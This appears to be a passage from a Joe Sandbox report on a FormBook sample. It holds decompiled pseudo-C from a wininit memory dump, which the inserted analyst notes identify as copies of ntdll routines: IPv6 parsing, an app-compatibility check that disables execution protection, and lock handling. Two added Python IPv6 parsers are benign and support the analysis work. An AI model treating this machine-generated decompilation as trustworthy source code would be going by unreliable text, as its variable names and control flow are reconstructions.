                                                						}
                                                					} else {
                                                						_t108 = 1;
                                                						_v16 = _t129;
                                                						_v24 = _t90;
                                                						do {
                                                							if( *_v16 == _t116) {
                                                								if(_t108 - _v12 > _a8 - _a4) {
                                                									_a4 = _v12;
                                                									_a8 = _t108;
                                                								}
                                                								_t116 = 0;
                                                							} else {
                                                								_v12 = _t108;
                                                							}
                                                							_v16 = _v16 + 2;
                                                							_t108 = _t108 + 1;
                                                							_t26 =  &_v24;
                                                							 *_t26 = _v24 - 1;
                                                						} while ( *_t26 != 0);
                                                						goto L11;
                                                					}
                                                				}
                                                			}
                                                0x02561424
                                                0x02561424
                                                0x02561427
                                                0x0256142b
                                                0x0256142c
                                                0x0256142c
                                                0x0256142c
                                                0x00000000
                                                0x0256141c
                                                0x02561411

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
• Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
• Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
• Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
• Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
• Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
• Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 8e5ac7a7627fdcd07ed08159b0ed4a413e3c7983aa5479391f2e33eaf94146e7
                                                • Instruction ID: 830e0e0b300caa3ebc1a9cb8378918e495e42fb1c863a52432f5175e75c3f489
                                                • Opcode Fuzzy Hash: 8e5ac7a7627fdcd07ed08159b0ed4a413e3c7983aa5479391f2e33eaf94146e7
                                                • Instruction Fuzzy Hash: A3615971E10A55AACF24DF59C8848BEBFB5FF84301B18C42DF49A47780D770A640CB68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E02557EFD(void* __ecx, intOrPtr _a4) {
                                                				signed int _v8;
                                                				char _v540;
                                                				unsigned int _v544;
                                                				signed int _v548;
                                                				intOrPtr _v552;
                                                				char _v556;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t33;
                                                				void* _t38;
                                                				unsigned int _t46;
                                                				unsigned int _t47;
                                                				unsigned int _t52;
                                                				intOrPtr _t56;
                                                				unsigned int _t62;
                                                				void* _t69;
                                                				void* _t70;
                                                				intOrPtr _t72;
                                                				signed int _t73;
                                                				void* _t74;
                                                				void* _t75;
                                                				void* _t76;
                                                				void* _t77;
                                                
                                                				_t33 =  *0x2602088; // 0x764b2ec1
                                                				_v8 = _t33 ^ _t73;
                                                				_v548 = _v548 & 0x00000000;
                                                				_t72 = _a4;
                                                				if(E02557F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                					__eflags = _v548;
                                                					if(_v548 == 0) {
                                                						goto L1;
                                                					}
                                                					_t62 = _t72 + 0x24;
                                                					E02573F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                					_t71 = 0x214;
                                                					_v544 = 0x214;
                                                					E0252DFC0( &_v540, 0, 0x214);
                                                					_t75 = _t74 + 0x20;
                                                					_t46 =  *0x2604218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                					__eflags = _t46;
                                                					if(_t46 == 0) {
                                                						goto L1;
                                                					}
                                                					_t47 = _v544;
                                                					__eflags = _t47;
                                                					if(_t47 == 0) {
                                                						goto L1;
                                                					}
                                                					__eflags = _t47 - 0x214;
                                                					if(_t47 >= 0x214) {
                                                						goto L1;
                                                					}
                                                					_push(_t62);
                                                					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                					E02573F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                					_t52 = E02530D27( &_v540, L"Execute=1");
                                                					_t76 = _t75 + 0x1c;
                                                					_push(_t62);
                                                					__eflags = _t52;
                                                					if(_t52 == 0) {
                                                						E02573F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                						_t71 =  &_v540;
                                                						_t56 = _t73 + _v544 - 0x218;
                                                						_t77 = _t76 + 0x14;
                                                						_v552 = _t56;
                                                						__eflags = _t71 - _t56;
                                                						if(_t71 >= _t56) {
                                                							goto L1;
                                                						} else {
                                                							goto L10;
                                                						}
                                                						while(1) {
                                                							L10:
                                                							_t62 = E02538375(_t71, 0x20);
                                                							_pop(_t69);
                                                							__eflags = _t62;
                                                							if(__eflags != 0) {
                                                								__eflags = 0;
                                                								 *_t62 = 0;
                                                							}
                                                							E02573F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                							_t77 = _t77 + 0x10;
                                                							E0259E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                							__eflags = _t62;
                                                							if(_t62 == 0) {
                                                								goto L1;
                                                							}
                                                							_t31 = _t62 + 2; // 0x2
                                                							_t71 = _t31;
                                                							__eflags = _t71 - _v552;
                                                							if(_t71 >= _v552) {
                                                								goto L1;
                                                							}
                                                						}
                                                					}
                                                					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                					_push(3);
                                                					_push(0x55);
                                                					E02573F92();
                                                					_t38 = 1;
                                                					L2:
                                                					return E0252E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                				}
                                                				L1:
                                                				_t38 = 0;
                                                				goto L2;
                                                			}

                                                0x02557f08
                                                0x02557f0f
                                                0x02557f12
                                                0x02557f1b
                                                0x02557f31
                                                0x02573ead
                                                0x02573eb4
                                                0x00000000
                                                0x00000000
                                                0x02573eba
                                                0x02573ecd
                                                0x02573ed2
                                                0x02573ee1
                                                0x02573ee7
                                                0x02573eec
                                                0x02573f12
                                                0x02573f18
                                                0x02573f1a
                                                0x00000000
                                                0x00000000
                                                0x02573f20
                                                0x02573f26
                                                0x02573f28
                                                0x00000000
                                                0x00000000
                                                0x02573f2e
                                                0x02573f30
                                                0x00000000
                                                0x00000000
                                                0x02573f3a
                                                0x02573f3b
                                                0x02573f53
                                                0x02573f64
                                                0x02573f69
                                                0x02573f6c
                                                0x02573f6d
                                                0x02573f6f
                                                0x0257e304
                                                0x0257e30f
                                                0x0257e315
                                                0x0257e31e
                                                0x0257e321
                                                0x0257e327
                                                0x0257e329
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0257e32f
                                                0x0257e32f
                                                0x0257e337
                                                0x0257e33a
                                                0x0257e33b
                                                0x0257e33d
                                                0x0257e33f
                                                0x0257e341
                                                0x0257e341
                                                0x0257e34e
                                                0x0257e353
                                                0x0257e358
                                                0x0257e35d
                                                0x0257e35f
                                                0x00000000
                                                0x00000000
                                                0x0257e365
                                                0x0257e365
                                                0x0257e368
                                                0x0257e36e
                                                0x00000000
                                                0x00000000
                                                0x0257e374
                                                0x0257e32f
                                                0x02573f75
                                                0x02573f7a
                                                0x02573f7c
                                                0x02573f7e
                                                0x02573f86
                                                0x02557f39
                                                0x02557f47
                                                0x02557f47
                                                0x02557f37
                                                0x02557f37
                                                0x00000000

                                                APIs
                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02573F12
                                                Strings
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0257E2FB
                                                • ExecuteOptions, xrefs: 02573F04
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 0257E345
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02573F4A
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02573EC4
                                                • Execute=1, xrefs: 02573F5E
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02573F75
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
• Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
• Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
• Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
• Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
• Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
• Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: BaseDataModuleQuery
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 3901378454-484625025
                                                • Opcode ID: d8c3af4e61a5218c85cc0b35b77124f4db482ef7f6e67eac814421cb543e8355
                                                • Instruction ID: 68458c7169c1d12f5f40a224a0079539634416c77b0f507c6eabdcd96e5d111c
                                                • Opcode Fuzzy Hash: d8c3af4e61a5218c85cc0b35b77124f4db482ef7f6e67eac814421cb543e8355
                                                • Instruction Fuzzy Hash: 7B41FD7168031D7AEF20DA54DCD9FDA73BDBF59714F000499A505E60C0E770DA458F69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

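A note for the analyst reading this dump: the "CLIENT(ntdll):" trace strings and the IPv6 format strings (`:%u.%u.%u.%u`, `::%hs%u.%u.%u.%u`, `::ffff:0:%u.%u.%u.%u`, `ffff:`) in the Similarity blocks identify this memory region as a copy of ntdll's own code, not FormBook logic; the function E02560B15 that follows is the string-to-address half of ntdll's IPv6 conversion pair (its checks for more than 4 hex digits per group, more than 3 dots, octets above 0xff, and its 0xC000000D return on malformed input are all visible in the decompilation). The block below is an added example, written for this page and not taken from the sample or from ntdll, that implements both directions to those rules so the behaviour can be tested offline. `parse_ipv6`, `format_ipv6` and the `STATUS_*` names are this example's own; the rule that `::` must stand for at least one zero group is an assumption of the example (RFC 4291 minimum), since the decompilation does not settle that edge case.

```python
"""Added example: IPv6 text <-> binary conversion written to the rules visible in
the decompiled ntdll routines on this page. Not code from the sample or from ntdll;
the function and constant names are this example's own."""
from typing import List, Optional, Tuple

STATUS_SUCCESS = 0x00000000
STATUS_INVALID_PARAMETER = 0xC000000D   # NTSTATUS the parser returns on bad input

_HEX = set("0123456789abcdefABCDEF")


class _Bad(Exception):
    """Internal signal: malformed address text."""


def _parse_groups(side: str, v4_allowed: bool) -> List[int]:
    """Turn 'a:b:c' (optionally ending in a dotted quad) into 16-bit groups."""
    if side == "":
        return []
    groups: List[int] = []
    parts = side.split(":")
    for i, part in enumerate(parts):
        if "." in part:
            # Embedded IPv4: only as the final element, exactly 4 decimal octets,
            # each 1..3 digits and <= 255 (the parser's >3-digit and >0xff checks).
            if not v4_allowed or i != len(parts) - 1:
                raise _Bad()
            quad = part.split(".")
            if len(quad) != 4:
                raise _Bad()
            octets = []
            for q in quad:
                if not (1 <= len(q) <= 3 and q.isascii() and q.isdigit()) or int(q) > 255:
                    raise _Bad()
                octets.append(int(q))
            groups.append((octets[0] << 8) | octets[1])
            groups.append((octets[2] << 8) | octets[3])
        else:
            # Hex group: 1..4 hex digits (a fifth digit is rejected).
            if not (1 <= len(part) <= 4) or any(c not in _HEX for c in part):
                raise _Bad()
            groups.append(int(part, 16))
    return groups


def parse_ipv6(text: str) -> Tuple[int, Optional[bytes]]:
    """Return (NTSTATUS, 16 bytes or None). At most one '::', exactly 8 groups."""
    try:
        if text.count("::") > 1:
            raise _Bad()
        if "::" in text:
            head, tail = text.split("::", 1)
            lo = _parse_groups(head, v4_allowed=False)   # dotted quad only at the end
            hi = _parse_groups(tail, v4_allowed=True)
            # Assumption of this example: '::' covers at least one zero group.
            if len(lo) + len(hi) > 7:
                raise _Bad()
            groups = lo + [0] * (8 - len(lo) - len(hi)) + hi
        else:
            groups = _parse_groups(text, v4_allowed=True)
            if len(groups) != 8:
                raise _Bad()
    except _Bad:
        return STATUS_INVALID_PARAMETER, None
    return STATUS_SUCCESS, b"".join(g.to_bytes(2, "big") for g in groups)


def format_ipv6(addr: bytes) -> str:
    """Render 16 bytes the way the format strings above do: '::a.b.c.d',
    '::ffff:a.b.c.d', '::ffff:0:a.b.c.d', else RFC 5952 '::' compression."""
    if len(addr) != 16:
        raise ValueError("need 16 bytes")
    w = [int.from_bytes(addr[i:i + 2], "big") for i in range(0, 16, 2)]
    v4 = "%d.%d.%d.%d" % tuple(addr[12:])
    if w[:5] == [0] * 5 and w[5] == 0xFFFF:
        return "::ffff:" + v4                      # IPv4-mapped
    if w[:4] == [0] * 4 and w[4] == 0xFFFF and w[5] == 0:
        return "::ffff:0:" + v4                    # IPv4-translated
    if w[:6] == [0] * 6 and w[6:] not in ([0, 0], [0, 1]):
        return "::" + v4                           # IPv4-compatible (not :: or ::1)
    # Longest run of zero groups (length >= 2), leftmost on a tie, becomes '::'.
    best_start, best_len, i = -1, 1, 0
    while i < 8:
        if w[i] == 0:
            j = i
            while j < 8 and w[j] == 0:
                j += 1
            if j - i > best_len:
                best_start, best_len = i, j - i
            i = j
        else:
            i += 1
    hexw = ["%x" % g for g in w]
    if best_start < 0:
        return ":".join(hexw)
    return ":".join(hexw[:best_start]) + "::" + ":".join(hexw[best_start + best_len:])


if __name__ == "__main__":
    for sample in ("2001:db8::1", "::ffff:192.0.2.1", "1:2:3:4:5:6:7:8:9", "12345::"):
        status, raw = parse_ipv6(sample)
        print("%-20s -> 0x%08X %s" % (sample, status, raw.hex() if raw else "-"))
```

When matching this against a live sample, feed it the same strings the malware hands to the real routine; inputs that this model rejects but the process accepts (or the reverse) point at a rule the decompilation does not show, which is worth noting before relying on any C2 address extracted from memory.
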
                                                C-Code - Quality: 100%
                                                			E02560B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				void* _t108;
                                                				void* _t116;
                                                				char _t120;
                                                				short _t121;
                                                				void* _t128;
                                                				intOrPtr* _t130;
                                                				char _t132;
                                                				short _t133;
                                                				intOrPtr _t141;
                                                				signed int _t156;
                                                				signed int _t174;
                                                				intOrPtr _t177;
                                                				intOrPtr* _t179;
                                                				intOrPtr _t180;
                                                				void* _t183;
                                                
                                                				_t179 = _a4;
                                                				_t141 =  *_t179;
                                                				_v16 = 0;
                                                				_v28 = 0;
                                                				_v8 = 0;
                                                				_v24 = 0;
                                                				_v12 = 0;
                                                				_v32 = 0;
                                                				_v20 = 0;
                                                				if(_t141 == 0) {
                                                					L41:
                                                					 *_a8 = _t179;
                                                					_t180 = _v24;
                                                					if(_t180 != 0) {
                                                						if(_t180 != 3) {
                                                							goto L6;
                                                						}
                                                						_v8 = _v8 + 1;
                                                					}
                                                					_t174 = _v32;
                                                					if(_t174 == 0) {
                                                						if(_v8 == 7) {
                                                							goto L43;
                                                						}
                                                						goto L6;
                                                					}
                                                					L43:
                                                					if(_v16 != 1) {
                                                						if(_v16 != 2) {
                                                							goto L6;
                                                						}
                                                						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                						L47:
                                                						if(_t174 != 0) {
                                                							E02538980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                							_t116 = 8;
                                                							E0252DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                						}
                                                						return 0;
                                                					}
                                                					if(_t180 != 0) {
                                                						if(_v12 > 3) {
                                                							goto L6;
                                                						}
                                                						_t120 = E02560CFA(_v28, 0, 0xa);
                                                						_t183 = _t183 + 0xc;
                                                						if(_t120 > 0xff) {
                                                							goto L6;
                                                						}
                                                						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                						goto L47;
                                                					}
                                                					if(_v12 > 4) {
                                                						goto L6;
                                                					}
                                                					_t121 = E02560CFA(_v28, _t180, 0x10);
                                                					_t183 = _t183 + 0xc;
                                                					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                					goto L47;
                                                				} else {
                                                					while(1) {
                                                						_t123 = _v16;
                                                						if(_t123 == 0) {
                                                							goto L7;
                                                						}
                                                						_t108 = _t123 - 1;
                                                						if(_t108 != 0) {
                                                							goto L1;
                                                						}
                                                						_t178 = _t141;
                                                						if(E025606BA(_t108, _t141) == 0 || _t135 == 0) {
                                                							if(E025606BA(_t135, _t178) == 0 || E02560A5B(_t136, _t178) == 0) {
                                                								if(_t141 != 0x3a) {
                                                									if(_t141 == 0x2e) {
                                                										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                											goto L41;
                                                										} else {
                                                											_v24 = _v24 + 1;
                                                											L27:
                                                											_v16 = _v16 & 0x00000000;
                                                											L28:
                                                											if(_v28 == 0) {
                                                												goto L20;
                                                											}
                                                											_t177 = _v24;
                                                											if(_t177 != 0) {
                                                												if(_v12 > 3) {
                                                													L6:
                                                													return 0xc000000d;
                                                												}
                                                												_t132 = E02560CFA(_v28, 0, 0xa);
                                                												_t183 = _t183 + 0xc;
                                                												if(_t132 > 0xff) {
                                                													goto L6;
                                                												}
                                                												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                												goto L20;
                                                											}
                                                											if(_v12 > 4) {
                                                												goto L6;
                                                											}
                                                											_t133 = E02560CFA(_v28, 0, 0x10);
                                                											_t183 = _t183 + 0xc;
                                                											_v20 = _v20 + 1;
                                                											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                											goto L20;
                                                										}
                                                									}
                                                									goto L41;
                                                								}
                                                								if(_v24 > 0 || _v8 > 6) {
                                                									goto L41;
                                                								} else {
                                                									_t130 = _t179 + 1;
                                                									if( *_t130 == _t141) {
                                                										if(_v32 != 0) {
                                                											goto L41;
                                                										}
                                                										_v32 = _v8 + 1;
                                                										_t156 = 2;
                                                										_v8 = _v8 + _t156;
                                                										L34:
                                                										_t179 = _t130;
                                                										_v16 = _t156;
                                                										goto L28;
                                                									}
                                                									_v8 = _v8 + 1;
                                                									goto L27;
                                                								}
                                                							} else {
                                                								_v12 = _v12 + 1;
                                                								if(_v24 > 0) {
                                                									goto L41;
                                                								}
                                                								_a7 = 1;
                                                								goto L20;
                                                							}
                                                						} else {
                                                							_v12 = _v12 + 1;
                                                							L20:
                                                							_t179 = _t179 + 1;
                                                							_t141 =  *_t179;
                                                							if(_t141 == 0) {
                                                								goto L41;
                                                							}
                                                							continue;
                                                						}
                                                						L7:
                                                						if(_t141 == 0x3a) {
                                                							if(_v24 > 0 || _v8 > 0) {
                                                								goto L41;
                                                							} else {
                                                								_t130 = _t179 + 1;
                                                								if( *_t130 != _t141) {
                                                									goto L41;
                                                								}
                                                								_v20 = _v20 + 1;
                                                								_t156 = 2;
                                                								_v32 = 1;
                                                								_v8 = _t156;
                                                								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                								goto L34;
                                                							}
                                                						}
                                                						L8:
                                                						if(_v8 > 7) {
                                                							goto L41;
                                                						}
                                                						_t142 = _t141;
                                                						if(E025606BA(_t123, _t141) == 0 || _t124 == 0) {
                                                							if(E025606BA(_t124, _t142) == 0 || E02560A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                								goto L41;
                                                							} else {
                                                								_t128 = 1;
                                                								_a7 = 1;
                                                								_v28 = _t179;
                                                								_v16 = 1;
                                                								_v12 = 1;
                                                								L39:
                                                								if(_v16 == _t128) {
                                                									goto L20;
                                                								}
                                                								goto L28;
                                                							}
                                                						} else {
                                                							_a7 = 0;
                                                							_v28 = _t179;
                                                							_v16 = 1;
                                                							_v12 = 1;
                                                							goto L20;
                                                						}
                                                					}
                                                				}
                                                				L1:
                                                				_t123 = _t108 == 1;
                                                				if(_t108 == 1) {
                                                					goto L8;
                                                				}
                                                				_t128 = 1;
                                                				goto L39;
                                                			}
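The decompiled routine above reads, by the checks visible in it, as an IPv6 string-to-address parser: it branches on 0x3a (':'), refuses a group index past 7, parses each group with base 0x10 and no more than 4 digits, records a single "::" position (_v32) as a one-time zero fill, and parses a dotted tail with base 0xa, rejecting any octet above 0xff. Identifying it as the ntdll-style IPv6 parser is an inference from those checks, not something the report states. The following is an added reference implementation of the same rules in readable form (example code, not taken from the sample or the report); the function names parse_ipv6, is_valid_ipv6, and the helpers are my own, and the sample addresses at the bottom are constructed inputs.

```python
"""Reference IPv6 text-to-binary parser (added example; not code from the report).

Rules mirrored from the decompiled checks: eight 16-bit groups, at most four
hex digits per group, at most one '::' used as zero fill, and an optional
dotted-quad tail whose decimal octets must be <= 0xff.
"""
import string

MAX_GROUPS = 8       # eight 16-bit groups in an IPv6 address
MAX_HEX_DIGITS = 4   # one group is at most four hex digits


class IPv6ParseError(ValueError):
    """Raised for any input the parser rejects."""


def _parse_group(group):
    """One hex group: 1..4 hex digits (base 0x10 in the decompilation)."""
    if not 1 <= len(group) <= MAX_HEX_DIGITS or any(c not in string.hexdigits for c in group):
        raise IPv6ParseError("bad hex group %r" % group)
    return int(group, 16)


def _parse_ipv4_tail(tail):
    """Dotted-quad tail: four decimal octets (base 0xa), each <= 0xff."""
    parts = tail.split(".")
    if len(parts) != 4:
        raise IPv6ParseError("embedded IPv4 needs four octets, got %r" % tail)
    out = bytearray()
    for part in parts:
        if not part.isdigit() or len(part) > 3:
            raise IPv6ParseError("bad IPv4 octet %r" % part)
        value = int(part, 10)
        if value > 0xFF:  # the '> 0xff' rejection seen in the decompilation
            raise IPv6ParseError("IPv4 octet out of range: %d" % value)
        out.append(value)
    return bytes(out)


def parse_ipv6(text):
    """Return the 16-byte network-order form of an IPv6 address string."""
    if text.count("::") > 1 or ":::" in text:
        raise IPv6ParseError("at most one '::' is allowed")
    head, sep, tail = text.partition("::")
    head_groups = head.split(":") if head else []
    tail_groups = tail.split(":") if tail else []

    ipv4 = b""
    if "." in text:
        # A dotted quad may only be the final component and occupies two groups.
        last = tail_groups if tail_groups else head_groups
        if text.endswith("::") or not last or "." not in last[-1]:
            raise IPv6ParseError("dotted quad must be the last component")
        ipv4 = _parse_ipv4_tail(last.pop())

    explicit = len(head_groups) + len(tail_groups) + (2 if ipv4 else 0)
    if sep:
        # '::' must stand for at least one group: no more than 7 explicit ones.
        if explicit > MAX_GROUPS - 1:
            raise IPv6ParseError("'::' present but no group left to compress")
        zero_fill = MAX_GROUPS - explicit
    else:
        if explicit != MAX_GROUPS:
            raise IPv6ParseError("expected %d groups, got %d" % (MAX_GROUPS, explicit))
        zero_fill = 0

    words = [_parse_group(g) for g in head_groups]
    words += [0] * zero_fill
    words += [_parse_group(g) for g in tail_groups]
    packed = b"".join(w.to_bytes(2, "big") for w in words) + ipv4
    if len(packed) != 16:  # defensive; the counting above already guarantees this
        raise IPv6ParseError("internal length error")
    return packed


def is_valid_ipv6(text):
    """True if parse_ipv6 accepts the string, False if it raises IPv6ParseError."""
    try:
        parse_ipv6(text)
    except IPv6ParseError:
        return False
    return True


if __name__ == "__main__":
    # Constructed sample inputs, including one that must be rejected (nine groups).
    for sample in ("::1", "2001:db8::ff00:42:8329", "::ffff:192.0.2.128", "1:2:3:4:5:6:7:8:9"):
        print(sample, "->", parse_ipv6(sample).hex() if is_valid_ipv6(sample) else "rejected")
```

When cross-referencing with the decompilation, _v20 corresponds to the index of the group being written into _a12, _v32 to the recorded "::" position, and the two E02560CFA calls to the base-16 group parse and the base-10 octet parse respectively.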

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: __fassign
                                                • String ID: .$:$:
                                                • API String ID: 3965848254-2308638275
                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction ID: 631800c2962b48370b08025785f14a665e538cd7e061fdb27eff9fdaea9734dd
                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction Fuzzy Hash: 3FA1B071D0020ADFDF25DF64C8487BEBBBABF45309F24846AD402A72C1D7319689CB59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 50%
                                                			E02560554(signed int _a4, char _a8) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int* _t49;
                                                				signed int _t51;
                                                				signed int _t56;
                                                				signed int _t58;
                                                				signed int _t61;
                                                				signed int _t63;
                                                				void* _t66;
                                                				intOrPtr _t67;
                                                				void* _t69;
                                                				signed int _t70;
                                                				void* _t75;
                                                				signed int _t81;
                                                				signed int _t84;
                                                				void* _t86;
                                                				signed int _t93;
                                                				signed int _t96;
                                                				intOrPtr _t105;
                                                				signed int _t107;
                                                				void* _t110;
                                                				signed int _t115;
                                                				signed int* _t119;
                                                				void* _t125;
                                                				void* _t126;
                                                				signed int _t128;
                                                				signed int _t130;
                                                				signed int _t138;
                                                				signed int _t144;
                                                				void* _t158;
                                                				void* _t159;
                                                				void* _t160;
                                                
                                                				_t96 = _a4;
                                                				_t115 =  *(_t96 + 0x28);
                                                				_push(_t138);
                                                				if(_t115 < 0) {
                                                					_t105 =  *[fs:0x18];
                                                					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                						goto L6;
                                                					} else {
                                                						__eflags = _t115 | 0xffffffff;
                                                						asm("lock xadd [eax], edx");
                                                						return 1;
                                                					}
                                                				} else {
                                                					L6:
                                                					_push(_t128);
                                                					while(1) {
                                                						L7:
                                                						__eflags = _t115;
                                                						if(_t115 >= 0) {
                                                							break;
                                                						}
                                                						__eflags = _a8;
                                                						if(_a8 == 0) {
                                                							__eflags = 0;
                                                							return 0;
                                                						} else {
                                                							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                							_t49 = _t96 + 0x1c;
                                                							_t106 = 1;
                                                							asm("lock xadd [edx], ecx");
                                                							_t115 =  *(_t96 + 0x28);
                                                							__eflags = _t115;
                                                							if(_t115 < 0) {
                                                								L23:
                                                								_t130 = 0;
                                                								__eflags = 0;
                                                								while(1) {
                                                									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                									asm("sbb esi, esi");
                                                									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026001c0;
                                                									_push(_t144);
                                                									_push(0);
                                                									_t51 = E0251F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                									__eflags = _t51 - 0x102;
                                                									if(_t51 != 0x102) {
                                                										break;
                                                									}
                                                									_t106 =  *(_t144 + 4);
                                                									_t126 =  *_t144;
                                                									_t86 = E02564FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                									_push(_t126);
                                                									_push(_t86);
                                                									E02573F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                									E02573F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                									_t130 = _t130 + 1;
                                                									_t160 = _t158 + 0x28;
                                                									__eflags = _t130 - 2;
                                                									if(__eflags > 0) {
                                                										E025A217A(_t106, __eflags, _t96);
                                                									}
                                                									_push("RTL: Re-Waiting\n");
                                                									_push(0);
                                                									_push(0x65);
                                                									E02573F92();
                                                									_t158 = _t160 + 0xc;
                                                								}
                                                								__eflags = _t51;
                                                								if(__eflags < 0) {
                                                									_push(_t51);
                                                									E02563915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                									asm("int3");
                                                									while(1) {
                                                										L32:
                                                										__eflags = _a8;
                                                										if(_a8 == 0) {
                                                											break;
                                                										}
